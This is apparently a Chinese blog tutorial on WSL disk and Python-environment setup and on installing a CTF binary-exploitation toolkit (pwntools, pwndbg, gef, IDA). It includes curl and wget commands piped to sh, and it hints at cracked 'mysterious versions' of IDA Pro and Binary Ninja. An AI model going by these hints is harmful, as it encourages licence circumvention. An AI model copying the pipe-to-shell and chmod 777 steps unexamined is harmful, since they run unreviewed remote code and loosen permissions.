就可以执行目录里的环境了 :::tip 当你要在当前环境安装包时，请使用 uv pip 来代替 pip ::: 如果你要使用 VS Code 的话，你需要修改一下配置文件的 python.venvPath 来确保你的环境能被搜索到转到 文件 > 首选项 > 设置 选中远程后搜索 python.venvPath，填入你存放虚拟环境的目录

5-4-2 Pyenv

输入以下指令就可以创建并激活

pyenv virtualenv <版本号> <名称>
pyenv local <名称>

例如我要创建并激活一个 3.13.7 的 CTFpy 虚拟环境，我就可以

5-4-3 Conda / Miniforge

conda create -n <起个名字> python=3.12
conda activate <名字>

然后我们修改一下 .zshrc，如果你使用 zsh 的话，末尾添加

conda activate <名字>

就可以默认激活对应环境

6. 添加并挂载数据盘（可选）

官方教程：开始在 WSL 2 中挂载 Linux 磁盘 | Microsoft Learn 有时候你可能会运行多个 wsl 发行版，并且会共同使用一些环境和数据，每个系统盘都下载一遍还是有点占空间了，我们可以单独挂载一个数据盘存储一些不是很吃环境的资料

6-1 添加虚拟磁盘

我们可以右键此电脑，点击 管理 进入计算机管理（进入方式不唯一），找到磁盘管理然后选择更多操作，再选择创建 vhd 选项，就可以进入虚拟磁盘创建页面，填入参数即可创建，可以参考我的然后我们会看到一个上面有黑条的磁盘跳出来了，我们先分离一下，右键分离，不然会被系统占用然后我们输入

wsl --mount --vhd "X:\path\to\data.vhdx" --bare

即可完成挂载

6-2 持久化挂载

值得一提的是，这个挂载不是永久的，当你重启 WSL 的时候就失去了挂载，因为我们希望虚拟机启动后挂载，其实我们可以使用 Crontab 启动，在某处准备一个脚本，写上

vim /path/to/automount

#!/bin/bash
/mnt/c/WINDOWS/system32/wsl.exe --mount --vhd "X:\path\to\Data.vhdx"

随后添加任务

crontab -e

# 打开后添加
@reboot /path/tp/automount

重启 WSL 查看挂载情况

wsl --shutdown
wsl

# 进入之后
lsblk

你会看到多出一块 128G 的磁盘，如下图，不过它的名称可能不固定，取决于挂载时机，正常按上文步骤你的磁盘应该是 sde ，但是如果你是先挂载再进入的子系统那么挂载的硬盘位置比系统盘要前，名字也会变成 sdd，但是丝毫不影响，下面操作

6-3 使用 fdisk 进行分区

使用命令行工具 fdisk

# 输入
sudo fdisk /dev/sde

# 回显
Welcome to fdisk (util-linux 2.41.1).
Changes will remain in memory only, until you decide to write them.
Be careful before using the write command.

Device does not contain a recognized partition table.
Created a new DOS (MBR) disklabel with disk identifier 0xc148e97b.

Command (m for help): m

Help:
  DOS (MBR)
   a   toggle a bootable flag
   b   edit nested BSD disklabel
   c   toggle the dos compatibility flag

  Generic
   d   delete a partition
   F   list free unpartitioned space
   l   list known partition types
   n   add a new partition
   p   print the partition table
   t   change a partition type
   v   verify the partition table
   i   print information about a partition
   e   resize a partition
   T   discard (trim) sectors
   
  Misc

   m   print this menu
   u   change display/entry units
   x   extra functionality (experts only)
   
  Script
   I   load disk layout from sfdisk script file
   O   dump disk layout to sfdisk script file
   
  Save & Exit
   w   write table to disk and exit
   q   quit without saving changes

  Create a new label
   g   create a new empty GPT partition table
   G   create a new empty SGI (IRIX) partition table
   o   create a new empty MBR (DOS) partition table
   s   create a new empty Sun partition table

我们要做的无非就是新建一个 GPT 格式的分区，按下面来就可以

Command (m for help): g

# 使用GPT
Created a new GPT disklabel (GUID: 89089BCF-4A99-4839-8857-F96D8A5CA7E6).

The device contains 'dos' signature and it will be removed by a write command. See fdisk(8) man page and --wipe option for more details.

Command (m for help): n
# 新建分区

Partition number (1-128, default 1):
First sector (2048-268435422, default 2048):
Last sector, +/-sectors or +/-size{K,M,G,T,P} (2048-268435422, default 268433407):
# 全部回车默认

Created a new partition 1 of type 'Linux filesystem' and of size 128 GiB.
Command (m for help): w
# 应用修改

这个时候我们就可以看到原来的新加磁盘 sde 多了一个 sde1 最后我们格式化分区为 ext4

sudo mkfs.ext4 /dev/sde1

6-4 磁盘挂载到目录

我们可以随便创建一个文件夹作为挂载点，一般来说都会再 /mnt 目录下建立一个文件夹

sudo mkdir /path/to/folder
# 例如 sudo mkdir /mnt/wsldata

由于磁盘名称可能会改变，所以我们需要使用唯一的 UUID 来识别每一个磁盘


lsblk -f

你会看到下面的内容复制 sde1 的 UUID，输入下面的命令

sudo mount UUID=<复制下来> /path/to/folder
# 例如 sudo mount UUID=4a1b8e8a-1251-4644-b987-37851976cb97 /mnt/wsldata

然后你就可以顺利挂载了，同时上面的命令可以添加到持久化挂载的脚本

Kali-Linux Pwn 环境配置 - 工具安装

Tue, 13 Jan 2026 00:00:00 GMT

:::note Tips：

本教程于 2026.1 更新 由于教程是在 WSL 子系统教程之后编写的，只作为针对新手的补充，后续可以参照子系统的教程，相对来说没有子系统的教程细致，但是更适合新手
- 使用 VMWare：VMWare Linux 基础配置
- 使用 WSL：WSL Linux 基础配置
- 工具安装：基础 Pwn 环境安装
本教程默认你有了基本的计算机操作水平并且已经解决了任何网络问题
由于网页和图床代理到 Cloudflare，如果你浏览有些卡顿甚至加载失败，请自行加速并刷新 :::

1. Linux 下 Pwn 基础环境安装

:::important 确保你使用了 pyenv，conda，uv，原始的 venv 等虚拟环境，或确保你可以使用 pipx 进行包管理，如果你没有准备环境，过度的话也可使用 apt 安装 :::

1-1 安装 Pwntools

Pwntools 是一个 Python 库，专门用于写利用脚本，核心功能包括构造 payload，自动处理网络连接，解析 ELF 文件，处理 ROP，远程交互，生成 ShellCode 等那你要问我，为什么不手动呢？手动 nc 只能做一次性试验，而真实利用往往涉及地址泄露、偏移计算、分阶段 payload、反复重连和自动化判断，人工既低效又容易出错，Pwntools 把整个攻击流程写成脚本，让打包、解析、计算和交互全部自动完成，从而实现可复现、可调试、可批量运行的 exploit，这在复杂场景下几乎是必需品我们会向 Python 环境中安装这个包，如果不用 apt 安装请务必激活当前的 Python 环境

<br>
pip install pwntools 


pipx install pwntools


sudo apt update
sudo apt install python3-pwntools


uv pip install pwntools 


python
from pwn import *

倘若没有什么报错，说明你的导入非常成功，只不过要注意，如果你是安装到了一个虚拟环境中，记得要先激活环境才能使用

1-2 安装 GDB 以及 Pwndbg / gef

:::tip 对于写文章的时候来说，由于常用的 GDB 插件 Pwndbg 最新的安装方式已经不是网络上存在的克隆仓库并执行 setup.sh 了，参考下文的一键安装，会自带 GDB 和 Pwndbg，可以考虑跳过下面 ::: 首先需要安装 GDB

sudo apt install gdb gdbserver gdb-multiarch

在此基础上我们会安装 Pwndbg / Pwngdb /peda / gef ，事实上 Pwndbg 是目前最常用的，gef 的非官方一个版本也很厉害，他们可以满足大部分需求

1-2-1 安装 Pwndbg

:::tip 通过一键安装的 Pwndbg 和 GDB 默认支持异架构，无需使用 multiarch 版本||，如果不支持，那你没办法|| ::: 项目链接：pwndbg/pwndbg: Exploit Development and Reverse Engineering with GDB & LLDB Made Easy 参考上面的链接，新版简化了安装流程，无需从源码安装，我们直接可以

apt install xz-utils
curl -qsL 'https://install.pwndbg.re' | sh -s -- -t pwndbg-gdb

就安装好了，输入 pwndbg 即可使用如果你想自定义安装位，你可以前往 Releases 下载压缩包解压到合适的位置

apt install xz-utils
chmod 777 pwndbg_2025.05.30_x86_64-portable.tar.xz
tar -xvf pwndbg_2025.05.30_x86_64-portable.tar.xz

解压之后会有四个文件夹出现，我们可以将当前文件夹的 bin 目录添加到环境变量，也可以将文件夹下的 bin 里的可执行文件链接到系统的任意环境变量目录下，这里采用了后者

sudo ln -s /path/to/pwndbg/bin/pwndbg /usr/bin/pwndbg

测试一下

pwndbg

1-2-2 集成 Pwngdb 与去重

项目地址：scwuaptx/Pwngdb: gdb for pwn 在任意目录下克隆库

git clone https://github.com/scwuaptx/Pwngdb.git

克隆之后你可以看到 angelheap 和 pwngdb.py
修改 Pwndbg 启动脚本

vim /path/to/pwndbg/bin/pwndbg

#!/bin/sh
dir="$(cd -- "$(dirname "$(dirname "$(realpath "$0")")")" >/dev/null 2>&1 ; pwd -P)"
export TERMINFO_DIRS=/etc/terminfo:/lib/terminfo:/usr/share/terminfo:/run/current-system/sw/share/terminfo:$dir/share/terminfo
export PYTHONNOUSERSITE=1
export PYTHONHOME="$dir"
export PYTHONPATH=""
export PATH="$dir/bin/:$PATH"


exec "$dir/lib/ld-linux-x86-64.so.2" "$dir/exe/gdb" --quiet --early-init-eval-command="set auto-load safe-path /" --command=$dir/exe/gdbinit.py "$@"


exec "$dir/lib/ld-linux-x86-64.so.2" "$dir/exe/gdb" --quiet --early-init-eval-command="set auto-load safe-path /" --command=$dir/exe/gdbinit.py --command=/path/to/pwngdb.py --command=/path/to/angelheap/gdbinit.py "$@"

可以使用一些特殊的命令验证是否安装成功安装此插件会导致 Pwndbg 的 canary 以及 got 命令被替换，对于喜欢 pwndbg 的命令（或者是因为颜色）的人来说，你可以去搞一下这个其实作者留下了一个兼容的脚本，就在 Pwngdb/pwndbg 中，不过由于更新问题兼容较为麻烦，这里我们有一种简单粗暴的方法，修改 Pwngdb/pwngdb.py

vim /path/to/Pwngdb/pwngdb.py

	... other ...

	def tls(self):
        """ Get tls base """
        print("\033[34m" + "tls : " + "\033[37m" + hex(gettls()))

        
    # def canary(self):
    #    """ Get canary value """
    #    print("\033[34m" + "canary : " + "\033[37m" + hex(getcanary()))

    def fmtarg(self,*arg):
        (addr,) = normalize_argv(arg,1)
        getfmtarg(addr)
        
   ... other ...
    
     def findsyscall(self):
        """ find the syscall gadget"""
        arch = getarch()
        start,end = codeaddr()
        if arch == "x86-64" :
            gdb.execute("find 0x050f " + hex(start) + " " + hex(end) )
        elif arch == "i386":
            gdb.execute("find 0x80cd " + hex(start) + " " + hex(end) )
        elif arch == "arm":
            gdb.execute("find 0xbc80df00 " + hex(start) + " " + hex(end) )
        elif arch == "aarch64":
            gdb.execute("find 0xd4000001 " + hex(start) + " " + hex(end) )
        else :
            print("error")

            
    #  def got(self):
    #    """ Print the got table """
    #    processname = getprocname()
    #   if processname :
    #        cmd = "objdump -R "
    #        if iscplus :
    #            cmd += "--demangle "
    #        cmd += "\"" + processname + "\""
    #        got = subprocess.check_output(cmd,shell=True)[:-2].decode('utf8')
    #       print(got)
    #    else :
    #        print("No current process or executable file specified." )

    def dyn(self):
        """ Print dynamic section """
        processname = getprocname()
        if processname :
            dyn = subprocess.check_output("readelf -d \"" + processname + "\"",shell=True).decode('utf8')
            print(dyn)
        else :
            print("No current process or executable file specified." )
   
   ... other ...

我们直接找到 /path/to/Pwngdb/pwngdb.py 使用直接注释法，把上图两个位置的函数注释掉就行,效果对比，注释之后是和注释之前

1-2-3 如何为依赖 Python 环境安装包

在以前的教程中是创建一个虚拟环境来安装 Pwndbg 的依赖，而官网最新的环境则是开箱即用的，无法通过正常途径为 Python 安装第三方的包，这里主要说明如何借一个 pip 来达成目的我们首先需要确定 Pwndbg 的 site-packages 文件夹在哪里，你应该找到你的安装目录，然后找到下面的目录

cd /path/to/Pwndbg/lib/python3.12/site-packages/

确定了路径之后，我们随便借一个 pip，这里使用了 uv 的 pip 安装一个包，使用 --target 参数指定目录

uv pip install --target=/path/to/Pwndbg/lib/python3.12/site-packages decomp2dbg

1-2-4 gef 安装（可以用于内核 / 异架构）

仓库链接：bata24/gef: GEF - GDB Enhanced Features - bata24's fork 一键安装，但是安装到了并且只推荐以 root 身份安装

wget -q https://raw.githubusercontent.com/bata24/gef/dev/install-uv.sh -O- | sudo sh

由于作者亲自说明是在 root 环境下测试，所以这里保持原位置，为了方便使用，可以：

sudo vim /usr/bin/gef

#!/bin/sh
sudo /usr/bin/gdb "$@"

然后赋予可执行权限

sudo chmod 777 /usr/bin/gef

效果图

1-2-5 设置默认 GDB（可选）

这个基于个人习惯，如果习惯默认使用 Pwndbg 而只想输入的话可以改一下名字

sudo mv /usr/bin/gdb /usr/bin/gdb-ori
sudo mv /usr/bin/pwndbg /usr/bin/gdb

如果更改的话记得上面的 gef 脚本要更改对应 GDB 二进制文件为对应名称，因为上文提到的 gef 插件是使用系统的 GDB 加载脚本运行的

sudo vim /usr/bin/gef

#!/bin/sh
sudo /usr/bin/gdb-ori "$@"

如果是脚本里用可以指定

context.gdb_binary = '/path/to/gdb'

1-3 安装其他小部件

记得一定要激活环境，请根据当前的环境管理方式自行决定工具的安装方式

conda activate <name>

1-3-1 ROPgadget 与 ropper

用于搜寻在 ROP 攻击时使用的 gadget

a
pip install ROPgadget

sudo apt install ropper

1-3-2 one_gadget

用于在 libc 库中找到一个直接执行可以 getshell 的地址

sudo apt install ruby ruby-dev gcc make
sudo gem install one_gadget

1-3-3 seccomp-tools

用于检测程序启用的沙箱保护

sudo gem install seccomp-tools

1-3-4 patchelf 与 glibc-all-in-one

由于题目在远程部署的环境和本地一定不相同，在某些对 libc 版本要求高的题目中需要更换指定的 libc

pip install patchelf
git clone https://github.com/matrix1001/glibc-all-in-one.git

glibc-all-in-one 官方页面在： matrix1001/glibc-all-in-one: 🎁A convenient glibc binary and debug file downloader and source code auto builder 可以参考进行进一步下载不同版本 libc 的方式

cd ./glibc-all-in-one 

./update_list # 更新列表
cat list # 查看列表

./download <name> # 开始下载

在之后使用 patchelf 即可

patchelf --set-interpreter <ld 位置> <文件位置>
patchelf --replace-needed <需替换的 libc 类型，例如 "libc.so.6"> <libc 位置> <文件位置>
或者
patchelf --set-rpath <'动态库文件夹位置1(必选):动态库文件夹位置1(可选):......'> <文件位置>

2. Pwn 基础工具

2-1 IDA Pro

2-1-1 基础安装

:::warning 这是一个商业软件，原则上你需要付费购买正版使用 ::: 运行安装程序即可，可以设置安装路径 IDA 集成了 Python 环境，不仅可以直接执行 Python 命令，也可以为各种插件提供支持，没有疑惑的话直接勾选安装吧，如果你有自己的环境的话可以参考下面的自定义教程第一次运行的时候会要求选择许可证，选择你拥有的对应的 idapro.hexlic 文件就可以了 :::note 如果你使用的是某些神秘版本，你可能会找到一些神秘的 *.dll 文件，你需要做的就是替换到安装目录的 ida32.dll 和 ida,dll 然后激活神秘的许可证文件，或者是某些神秘 *.py 脚本，在安装目录下执行脚本就可以了 ::: 效果如下图

2-1-2 自定义 IDAPython 环境

在安装目录找到 idapyswitch.exe 如果双击可以打开，那你可以通过数字选择你想使用的环境（最好是独立的环境）如果没有想用的环境或者是根本是一闪而过的窗口的话，我们可以在当前目录起一个命令窗口执行这个程序，并使用 --force-path 参数来指定 Python 的地址，一般选择 python3.dll ，来源最好是官方安装包，版本推荐 3.11

.\idapyswitch.exe --force-path "F:\Tools\Disassembler\IDA Python\python3.dll"

2-1-3 安装插件

安装插件的方法各异，需要针对不同插件，这里就不赘述了，总体来说分为三种

扔到安装目录的 plugins 文件夹
在 IDAPython 中安装必要的包和依赖
在其他环境中安装必要的包和依赖怎么证明安装成功了呢，可以看下面的 Output 有没有报错，看看能不能使用插件功能我用的有下面的一些，感觉足够日常使用了，这里就不贴链接了
finger_plugin
keypatch
LazyIDA
ida-pro-mcp
patching
decomp2dbg

2-2 Ghidra

仅作介绍：这是一款由美国国家安全局开源的反编译工具，你可以前往 Github 下载，可以安装很多的插件，但是效果不如 IDA，对于某些冷门的架构而你没有购买 IDA 的高级商业版本的情况下可能有奇效||，毕竟其他的软件都用不了||

2-3 Binary Ninja

:::warning 和 IDA Pro 一样，这是一个商业软件，原则上你需要付费购买正版使用 ::: 仅作介绍：和 IDA 差不多，也是一个商业软件，使用起来也不错，据说有官方带头的插件和 MCP 生态，周围有氪金使用的用起来很爽，不过入门的话其实也差不多，本人用的也不是很多，可以考虑备一个||，感觉购买有点亏的话可以寻找神秘版本||

3. Pwn 特殊环境 - C++

:::warning 并非完全体，还在更新 ::: 当我们目光看向一道 C++ 的题目，正常的 C++ 题目都会提供下面这几样库文件，使用 patchelf 更改就行如果有些只给出了 libc.so.6 的话，你就需要手动下载其他的文件

3-1 下载对应发行版本的 libstdc++.so.6

3-1-1 从 Docker / 对应 Linux 里扒

很简单，如果题目给 Dockerfile 了，可以尝试部署题目的 Docker 环境，把用的库拷贝出来，使用 patchelf 或其他方式更改，如果没有就找 libc 或者是程序字符串寻找版本特征并从对应 Docker 或者 Linux 系统把缺的库扒出来

3-1-2 手动下载

如果你发现 patch 完之后会说你的 libstdc++.so.6 需要更高版本，那么你可能需要更换一下这个库，一般来说这个东西不吃小版本，也没必要对应 Ubuntu 的版本下载了，直接前往 Debian 官网下载对应版就行访问官网：Debian -- 软件包点击下面有搜索，直接搜索你要找的就是下面这样的，叫做 libstdc++6-xx-dbg 的包如何确定你需要哪个？点进去看一眼版本确认版本后就可以下载，如果程序需要的话，你可能还需要下载一个 libgcc_s.so.1 同时下面还有 dev 包供你选择，内含源码（可选，一般用不到）

3-2 替换程序使用的库

经测试，libm.so.6 有一定概率无法使用 patchelf 的 --set-interpreter 进行修改，我们可以通过指定环境变量 LD_PRELOAD 来强制替换该库，它的位置和 libc 与 ld 坐一桌，正常运行只需要

LD_PRELOAD=/path/to/target.so ./pwn
# 示例 LD_PRELOAD=./libm.so.6 ./pwn

如果你要引入多个，使用 : 隔开

LD_PRELOAD=./libc.so.6:./libstdc++.so.6:./libm.so.6:./libgcc_s.so.1 ./pwn